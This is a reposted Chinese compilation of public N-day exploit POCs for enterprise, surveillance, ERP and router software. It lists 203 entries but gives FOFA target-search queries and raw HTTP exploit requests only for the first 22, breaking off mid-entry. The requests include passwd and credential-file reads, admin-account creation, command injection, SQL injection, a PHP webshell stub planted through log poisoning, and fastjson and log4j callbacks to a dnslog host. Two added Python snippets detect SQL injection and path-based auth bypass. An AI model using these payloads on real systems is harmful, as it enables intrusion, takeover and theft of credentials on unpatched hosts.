Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities makes up a large share of real-world attack activity. This article is meant to help defenders; defensive teams can use its contents for their own risk checks.

Sources: the article covers 203 public POCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites and were compiled for publication by the 网络安全新视界 team.

Patches: every vulnerability here is already public. For patches or remediation guidance, contact the product vendor.

Content: for space reasons, a few POCs that are too long are abbreviated with the placeholder PAYLOAD; search for the full POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to receive the full list" gate. This article is the complete, current list; use your browser's find function (Ctrl+F) to search for keywords.

Bookmark this article if you need it, or follow the public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP (jshERP) getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8 Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition access management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 DesignReportSave.jsp arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi-Anxin 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi-Anxin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information release system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical image viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
Send the path exactly as written (for example with curl --path-as-is); a client that collapses the ../ segments before sending never reaches the traversal.
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Replace the password value with the MD5 hash of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
Command injection through the log parameter; look for the output of whoami in the response.
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
jdbc.properties holds the database connection string and credentials.
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin panel with the default account admin first, then send the request below. The stok value in the path and the sysauth cookie come from that login session; the command is injected through the wifiRebootrange field (12:00; id;), and the %s values are placeholders kept from the original POC.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

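Entry 9 hides its statement behind two rounds of URL encoding, so a filter that decodes once sees nothing but percent escapes. The Python below is an added example, not part of the original list and not any vendor's code: it decodes a query string until the value stops changing, records how many rounds that took, and flags the injection markers used by the POCs in this list (entries 9, 11, 17, 19, 26 and 27). The sample query strings are constructed here from those POCs; the pattern names are my own.

```python
import re
from urllib.parse import quote, unquote_plus

# Injection markers taken from the POCs in this list (entries 9, 11, 17, 19, 26, 27).
SQLI_PATTERNS = {
    "extractvalue": re.compile(r"extractvalue\s*\(", re.I),        # MySQL error-based
    "updatexml": re.compile(r"updatexml\s*\(", re.I),              # MySQL error-based
    "mssql_time_delay": re.compile(r"waitfor\s+delay", re.I),      # SQL Server time-based
    "oracle_pipe_delay": re.compile(r"dbms_pipe\.receive_message", re.I),  # Oracle time-based
    "mssql_version": re.compile(r"@@version", re.I),               # SQL Server error-based
    "comment_tail": re.compile(r"(--|#)\s*$"),                     # rest of statement commented out
}


def decode_fully(value, max_rounds=3):
    """URL-decode until the value stops changing; returns (decoded, rounds)."""
    rounds = 0
    current = value
    while rounds < max_rounds:
        decoded = unquote_plus(current)   # also maps '+' to space
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def scan_query(query_string):
    """Return {param: {"rounds": n, "hits": [...]}} for parameters that look injected."""
    findings = {}
    for pair in query_string.split("&"):
        name, _, raw_value = pair.partition("=")   # split at the first '=' only
        value, rounds = decode_fully(raw_value)
        hits = [label for label, rx in SQLI_PATTERNS.items() if rx.search(value)]
        if hits:
            findings[name] = {"rounds": rounds, "hits": hits}
    return findings


def double_encode(payload):
    """The encoding entry 9 describes: URL-encode the statement twice."""
    return quote(quote(payload, safe=""), safe="")


# Constructed samples; the SQL fragments are the ones quoted in this list.
DOCCMS_PAYLOAD = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"
SAMPLES = {
    "doccms_double_encoded": "keyword=" + double_encode(DOCCMS_PAYLOAD),
    "landray_mssql": "recordid=1'%20and%201=@@version--+&edittype=1,1",
    "dahua_mysql": "bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))"
                   "%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1",
    "yonyou_mssql_time": "pageId=login&pkBill=1'waitfor+delay+'0:0:5'--",
    "yonyou_oracle_time": "id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)--",
    "benign": "keyword=hello%20world&page=2",
}


def scan_samples():
    """Run the scanner over every sample; an empty dict means nothing was flagged."""
    return {name: scan_query(qs) for name, qs in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in scan_samples().items():
        print(f"{name:22s} {result or 'clean'}")
```

A rounds value of 2 or more is itself worth alerting on: legitimate clients almost never double-encode a parameter, so the decoding depth is a signal independent of any pattern list.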
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
The comparison 1=@@version forces a type-conversion error on SQL Server whose message carries the version string, so a vulnerable host reveals it in the error page.
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the session cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is reused in the following requests:
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step two: POST the login form. The language field traverses into application/logs so that the request lands in the log file, and the login field carries a PHP stub that base64-decodes and executes the value of the K1SYJPMHLU4Z request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step three: send the following request to the lab target to run the id command. The log file name carries the current date (here 2023-10-24, matching the Date header above), and the K1SYJPMHLU4Z header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP (jshERP) getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords. Send the path as-is (curl --path-as-is); a client that resolves the ../ itself turns the request into the plain /jshERP-boot/user/getAllList, which requires a login.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

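Entries 14 and 15 end up at the same getAllList handler; what differs is only the decoration on the path (a ;.ico matrix suffix, an a.ico/../ segment) that gets the request past the login check. The Python below is an added example, not jshERP's code: it models an authorization filter that exempts static resources by looking for a suffix anywhere in the raw path (an assumed simplification of the flawed check, not a claim about jshERP's source) beside one that first normalizes the path the way a servlet container and Spring MVC do before routing (percent-decode, drop ;matrix parameters, resolve ..) and only then applies the exemption to the real last segment. The request paths are the two from these entries plus constructed variants; the suffix and prefix lists are assumptions.

```python
from urllib.parse import unquote

# Suffixes a login filter typically exempts as static content (assumed list).
STATIC_SUFFIXES = (".ico", ".css", ".js", ".png", ".html")
# Handlers that must never be reached without a session (assumed for this model).
PROTECTED_PREFIXES = ("/jshERP-boot/user/",)


def normalize_path(path):
    """Reduce a raw request path to what the handler mapping actually sees:
    percent-decode, drop matrix parameters (';...' after a segment), resolve '.' and '..'."""
    stack = []
    for segment in unquote(path).split("/"):
        segment = segment.split(";", 1)[0]      # 'getAllList;.ico' -> 'getAllList'
        if segment in ("", "."):
            continue
        if segment == "..":
            if stack:
                stack.pop()                     # 'a.ico/../getAllList' -> 'getAllList'
            continue
        stack.append(segment)
    return "/" + "/".join(stack)


def weak_is_static(path):
    """The flawed exemption (assumed simplification): a static suffix anywhere in the raw path."""
    return any(suffix in path for suffix in STATIC_SUFFIXES)


def strict_is_static(path):
    """Exempt only when the normalized path's last segment really ends with a static suffix."""
    last_segment = normalize_path(path).rsplit("/", 1)[-1]
    return last_segment.endswith(STATIC_SUFFIXES)


def requires_login(path, is_static):
    """True when the request routes to a protected handler and is not exempted."""
    return normalize_path(path).startswith(PROTECTED_PREFIXES) and not is_static(path)


# Constructed requests: the first two paths are the ones from entries 14 and 15.
REQUESTS = (
    "/jshERP-boot/user/getAllList;.ico",
    "/jshERP-boot/user/a.ico/../getAllList",
    "/jshERP-boot/user/a.ico/%2e%2e/getAllList",
    "/jshERP-boot/user/getAllList",
    "/jshERP-boot/favicon.ico",
)


def compare():
    """{raw path: (handler path, login enforced by weak check, login enforced by strict check)}"""
    return {
        path: (normalize_path(path),
               requires_login(path, weak_is_static),
               requires_login(path, strict_is_static))
        for path in REQUESTS
    }


if __name__ == "__main__":
    for path, (handler, weak, strict) in compare().items():
        print(f"{path:45s} -> {handler:32s} weak={weak!s:5s} strict={strict}")
```

The general rule the example encodes: an authorization decision must be made on the same path representation the framework uses to pick the handler, otherwise any difference between the two (matrix parameters, dot segments, percent-encoding, case) is a bypass.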
16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The injected sort expression calls HASHBYTES to compute the MD5 of 1234; a successful injection returns that hash (81dc9bdb52d04dc20036dbd8313ed055, letter case may differ) in the response.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
Error-based injection through the SOAP netMarkings parameter; a vulnerable host echoes md5(102103122) in the XPath error message.
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
The JSON below is the common fastjson java.net.URL probe: a vulnerable parser resolves the val host, so confirm through a DNS record at the dnslog domain (replace farr9frh.dnslog.pw with your own). The probe only proves the parser is reachable; code execution needs a separate gadget chain.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
Replace dnslog with your own DNS log domain and confirm through the callback.
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
